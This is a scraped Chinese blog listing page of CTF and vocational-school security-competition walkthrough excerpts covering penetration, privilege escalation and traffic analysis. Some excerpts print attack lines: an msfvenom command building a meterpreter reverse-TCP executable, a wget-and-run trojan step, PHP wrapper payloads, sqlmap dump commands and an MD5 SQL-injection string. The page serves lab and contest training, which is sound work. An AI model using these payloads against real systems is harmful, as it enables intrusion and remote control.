自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(70)
  • 收藏
  • 关注

原创 Web应用程序文件包含-Server2233-解析

需要环境私信或者加qq

2024-12-05 16:12:18 51

原创 网络安全比赛-网络安全事件响应-Server2216(解析)

需要环境加qq,私信

2024-06-11 10:52:33 246

原创 B-6 Web应用程序文件包含-Server2233(环境+解析)

需要环境加qq,私信

2024-06-11 10:52:00 294

转载 CMS网站渗透-Server2206-(解析+环境)

需要换加qq

2024-01-29 21:02:50 612

原创 web渗透测试-Server2225-(环境+解析)

需要环境加qq

2024-01-29 21:02:18 342

原创 事件分析应急响应-Server2229(环境+解析)

需要环境加qq或者私信

2024-01-14 16:44:16 502

原创 中职组安全-win20230217-环境-解析

msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=10.100.100.119 LPORT=4444 -b"\x00" -f exe > aiyou.exe将驱动开启就可以传文件到靶机运行。5·访问服务器主机,找到主机中管理员桌面下文本文档信息,将文本文档中信息作为Flag值提交;6·访问服务器主机,找到主机中回收站唯一信息,将信息中的内容作为Flag值提交。3·访问服务器主机,找到主机中管理员密码,将管理员密码作为Flag值提交;

2024-01-14 16:43:20 618

原创 流量分析-FTPServer20221010.img-(环境解析)

需要环境加qq

2024-01-11 10:38:04 423

原创 信息安全与评估-数据包分析

做为FLAG提交。4. 继续分析数据包capture-z2.pcap,分析黑客进行了协议攻击,将数据包协议名称,操作代码的值,协议类型16进制,发送者的 MAC 地址后四位16进制,发送者的实际IP 以冒号分隔的形式作为FLAG提交。2. 继续分析数据包capture-z2.pcap,发现了大量的扫描数据包,找出攻击机的 IP 地址,采用了哪一种端口扫描技术。6. 继续分析数据包capture-z2.pcap, 接上题,分析黑客是否获得了机密文件,将文件名作为FLAG提交。

2024-01-11 10:37:22 705 2

原创 B-5:系统渗透:

6.在渗透机中对服务器主机进行渗透,在服务器主机中找到管理员家目录下的flag文件,将文件中内容作为Flag值提交。5.在渗透机中对服务器主机进行渗透,在服务器主机中找到网站根目录下的flag文件,将文件中内容作为Flag值提交;2.在渗透机中对服务器主机进行渗透,在服务器主机中获取服务器主机名称,将主机名作为Flag值提交;4.在渗透机中对服务器主机进行渗透,在服务器主机中获取管理员的密码,将密码作为Flag值提交;1.在渗透机中对服务器主机进行信息收集,将服务器开启的端口号作为Flag值提交;

2023-12-16 15:07:10 212

原创 压缩包文件暴力破解 -Server2005(解析)

2. 通过本地PC中渗透测试平台Kali对服务器场景Windows进行渗透测试,使 用 kali 中 hydra 对服 务器 Telnet 服务进行暴力破解(用户名为 rartest), 找到加密后的压缩包文件,将加密压缩包的文 件名作为 Flag 提交;for /r C:/ %i in (*.zip) do @echo %i //找后缀名为zip的 这个有点鬼,命令打完,搜,我还以为那个地方是命令,其实是搜到东西。http://192.168.0.108/flag(Pwd000).zip //直接访问。

2023-12-16 15:06:08 308

原创 中职组网络安全赛题

2. 通过本地PC中的渗透测试平台KALI2020下载靶机中的数据包,通过WIRESHARK软件分析数据包内的数据,找到黑客扫描我们服务器开放了哪些端口,将我们服务器中开放的TCP端口按照从小到大的顺序排序后MD5加密后作为FLAG进行提交(如:MD5加密前:21/22/23/24/25);2. 通过本地PC中的渗透测试平台KALI2020下载靶机中的数据包,通过WIRESHARK软件分析数据包内的数据,找到黑客在网站中下载的私钥文件,将黑客下载的私钥文件的文件名进行MD5加密后作为FLAG进行提交;

2023-12-07 16:09:26 148

原创 Linux 系统渗透提权-Server2204-(解析)

4.使用渗透机对服务器管理员提权,并将服务器中 root 目录下的文本内容作 为 flag 提交;6.使用渗透机对服务器管理员提权,并将服务器中 root 目录下的图片内容作 为 flag 提交。5.使用渗透机对服务器管理员提权,并将服务器中 root 的密码作为 flag 提交;3.使用渗透机对服务器信息收集,并将服务器中系统内核版本作为 flag 提交;2.使用渗透机对服务器信息收集,并将服务器中主机名称作为 flag 提交;用linux的wget下载给777权限木马并执行。发现scp和nc都用不了。

2023-12-07 16:08:41 277

原创 系统渗透-lin20230502(解析+环境)

6.在渗透机中对服务器主机进行渗透,在服务器主机中找到管理员家目录下的flag文件,将文件中内容作为Flag值提交。5.在渗透机中对服务器主机进行渗透,在服务器主机中找到网站根目录下的flag文件,将文件中内容作为Flag值提交;2.在渗透机中对服务器主机进行渗透,在服务器主机中获取服务器主机名称,将主机名作为Flag值提交;4.在渗透机中对服务器主机进行渗透,在服务器主机中获取管理员的密码,将密码作为Flag值提交;1.在渗透机中对服务器主机进行信息收集,将服务器开启的端口号作为Flag值提交;

2023-11-30 16:32:18 432

原创 Linux 系统渗透提权-Server2204

需要环境私信

2023-11-30 16:20:42 326

原创 Linux系统渗透提权-Server2202

需要环境私信

2023-11-29 04:15:00 256

原创 网络安全应急响应-Server2228(环境+解析)

需要环境私信

2023-11-28 08:45:00 937

原创 远程代码执行-Server2207

需要环境私信

2023-11-27 10:15:00 102

原创 JavaScript安全绕过-Server2201(环境+解析)

需要环境的加qq

2023-11-26 16:45:53 184

原创 中间件渗透测试-Server2131(解析+环境)

通过渗透测试平台Kalie对靶机场景Server2131进行网站目录枚举渗透测试,使用工具dirb的默认字典来进行枚举,将dirb工具返回结果中的最后一行的URL作为Flag值提交;通过渗透测试平台Kali对靶机场景Server2131进行网站目录枚举渗透测试,使用工具dirb的默认字典来进行枚举,将dirb工具返回结果中的扫描到的目录数量作为Flag值提交;通过渗透测试平台Kali对靶机场景Server2131进行渗透测试,将该场景tomcat网站渗透成功后回显的关键提示信息作为Flag值提交;

2023-11-25 17:06:17 386

原创 中职网安-Linux操作系统渗透测-Server2130(环境加qq)

B-9:Linux操作系统渗透测任务环境说明: 服务器场景:Server2130 服务器场景操作系统:Linux(关闭链接)1.通过本地PC中渗透测试平台Kali对靶机场景进行系统服务及版本扫描渗透测试,并将该操作显示结果中Apache服务对应的版本信息字符串作为Flag值提交;2.通过本地PC中渗透测试平台Kali对靶机场景进行渗透测试,将该场景/var/www/html目录中waf防火墙文件中的所有的被过滤的字符串内容作为Flag值提交;

2023-11-25 17:02:58 275

原创 [极客大挑战 2019]Secret File1

直接加在网站后面,发现了有关。伪协议,构造伪协议方式。

2023-11-25 15:11:56 104

原创 中职组网络安全-linux渗透测试-Server2203(环境+解析)

需要环境私信

2023-11-25 15:11:21 1115

原创 中职组网络安全-Windows操作系统渗透测试 -20221219win(环境+解析)

1.通过本地PC中渗透测试平台Kali对服务器场景Server08进行系统服务及版本扫描渗透测试,并将该操作显示结果中1433端口对应的服务版本信息作为Flag值提交(例如3.1.4500);2.通过本地PC中渗透测试平台Kali对服务器场景Server08进行系统服务及版本扫描渗透测试,将DNS服务器的主机完全合格域名作为Flag值提交;4.将目标服务器中SQL-Server数据库权限较高(可以通过数据库指令执行系统命令)用户的密码作为Flag值提交;128为kali的ip地址。

2023-11-25 15:07:51 232

原创 中职组网络安全-PYsystem003.img(环境+解析)

需要环境私信我

2023-11-25 11:44:59 425

原创 中职组网络安全-FTPServer20221010.img(环境+解析)

分析attack.pcapng数据包文件,通过分析数据包attack.pcapng找出恶意用户第一次访问HTTP服务的数据包是第几号,将该号数作为Flag值提交;继续查看数据包文件attack.pcapng,分析出恶意用户扫描了哪些端口,将全部的端口号从小到大作为Flag值(形式:端口1,端口2,端口3…继续查看数据包文件attack.pcapng分析出恶意用户写入的一句话木马的密码是什么,将一句话密码作为Flag值提交;用户名:attack817 密码:attack817。

2023-11-25 11:43:12 374 1

原创 中职组网络安全-web-PYsystem003.img-(环境+解析)

将 text.txt 删除,并添加 php://filter/read=convert.base64-encode/resource=flag.php(使用base64对flag.php输出流进行编码)目标URL -D '数据库' -T '表名' --columns #选择表名,之后需要对字段进行爆破猜解。目标URL -D '数据库' -T '表名' -C '字段名' -dump #爆破字段值。目标URL --dbs #爆破出目标系统中的所有数据库。通过burp抓包 添加。

2023-11-25 11:38:55 466

原创 河南省第一届职业技能大赛网络安全项目试题

(4)在上一题的基础上使用命令调用该模块,并查看需要配置的信息(使用show options命令),将回显中需要配置的目标地址,密码使用的猜解字典,线程,账户配置参数的字段作为FLAG提交(之间以英文逗号分隔,例hello,test,..,..);密码:root),进入mysql数据库,改变默认 mysql 管理员的名称,将系统的默认管理员root 改为 admin,防止被列举,将操作命令作为flag提交。密码:root),查看数据库版本号,将查看数据库版本号的命令作为flag提交;

2023-11-25 11:27:23 466

原创 [SWPUCTF 2022 新生赛]ez_sql

参数为1的时候没有报错,为2和任何数的时候报,发现空格被过滤了,然后union需要双拼写。它的表有两个为,NSS_tb和users。查表的字段发现flag。数据库为NSS_db。

2023-11-25 11:14:54 598 1

原创 [SWPUCTF 2021 新生赛]PseudoProtocols

方法2:a=data://text/plain;base64,SSB3YW50IGZsYWc=提交的伪协议的内容需要是== I want flag,就会echo flag。方法1:a=data://text/plain,I want flag。题目很明确了就是伪协议。

2023-11-25 11:11:39 181

原创 [BJDCTF 2020]easy_md5

我们的目标就是要找一个字符串取32位16进制的md5值里带有276f7227这个字段的,接着就是要看关键的数字部分了,在276f7227这个字段后面紧跟一个数字,除了0,1-9,对应的asc码值是49-57,转化为16进制就是31-39,也就是我们需要有276f7227+(31-39)这个字段,就可以满足要求。ffifdyop,这个点的原理是 ffifdyop 这个字符串被 md5 哈希了之后会变成 276f722736c95d99e921722cf9ed621c,这个字符串前几位刚好是 ‘ or ‘6。

2023-11-25 11:09:47 209

原创 [ZJCTF 2019]NiZhuanSiWei

虽然有include函数但我们无法直接包含flag因为对file进行了过滤,又看见有的入口,只是并没有发现可利用的方法,但题目有提示所以尝试将其调出来。

2023-11-25 11:07:00 149

原创 [SWPUCTF 2021 新生赛]no_wakeup

这是因为PHP在反序列化时会检查序列化字符串的长度,如果长度小于等于2,则不会调用__wakeup()方法。发现没有绕过,改成大于2的绕过。

2023-11-25 11:05:15 283

原创 bugkuctf--Crypto--抄错的字符

老师让小明抄写一段话,结果粗心的小明把部分数字抄成了字母,还因为强迫症把所有字母都换成大写。这里其实是base64加密只是更换了。

2023-11-25 11:01:45 153

原创 「 Tomcat-pass-getshell 弱口令」

tomcat。

2023-11-23 15:48:29 75

原创 2022中职组网络安全-服务远程控制(环境+靶机)

3.通过本地PC中渗透测试平台Kali对服务器场景进行渗透测试,找到服务器场景中的管理员用户的桌面下中的可执行文件,并将全称作为FLAG提交;5.通过本地PC中渗透测试平台Kali对服务器场景进行渗透测试,找到服务器场景中的管理员用户的文档中的文件,将文件内容作为FLAG提交;7.通过本地PC中渗透测试平台Kali对服务器场景进行渗透测试,找到服务器场景中的桌面背景,并将的文件全称作为FLAG提交;这里我们已经连接过去了打开靶机的远程桌面服务,发现靶机的远程服务打开了网络验证。用远程连接过去拿到falg。

2023-11-23 15:48:03 100

原创 中职组网络安全B模块-渗透提权2

访问服务器主机,找到主机中管理员桌面下图片信息,将图片名称作为。访问服务器主机,找到主机中管理员桌面下图片信息,将图片信息作为。访问服务器主机,找到主机中回收站唯一信息,将信息中的内容作为。访问服务器主机,找到主机中管理员名称,将管理员名称作为。访问服务器主机,找到主机中管理员密码,将管理员密码作为。访问服务器主机,找到主机中补丁信息,将补丁编号作为。

2023-11-22 09:49:10 712

原创 中职组网络安全 Server-Hun-1.img Server-Hun-2.img

还是失败提示需要密钥,尝试。上生成一个密钥,通过上传到。用户权限,使用脏牛提权。

2023-11-22 09:34:48 812

原创 Server2201-网络安全

6.使用渗透机场景windows7根据第五题入口继续访问服务器的本题场景,通过提示得到flag并提交;使用渗透机场景windows7根据第二题的入口继续访问服务器本题场景,通过提示得到flag并提交;使用渗透机场景windows7根据第三题入口继续访问服务器的本题场景,通过提示得到flag并提交;使用渗透机场景windows7根据第四题入口继续访问服务器的本题场景,通过提示得到flag并提交;使用渗透机场景windows7根据第五题入口继续访问服务器的本题场景,通过提示得到flag并提交;

2023-07-15 14:56:44 120

原创 网页渗透-21-Server21

访问服务器网站目录1,根据页面信息完成条件,将获取到的flag提交;访问服务器网站目录2,根据页面信息完成条件,将获取到的flag提交;访问服务器网站目录3,根据页面信息完成条件,将获取到的flag提交;访问服务器网站目录4,根据页面信息完成条件,将获取到的flag提交;访问服务器网站目录6,根据页面信息完成条件,将获取到的flag提交;这两题考的都是过滤,这题用**") 和 # 符号**过滤。,根据页面信息完成条件,将获取到的。服务器场景操作系统:未知(封闭。burp抓包,好像要绕过登录。

2023-07-15 09:57:16 92

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除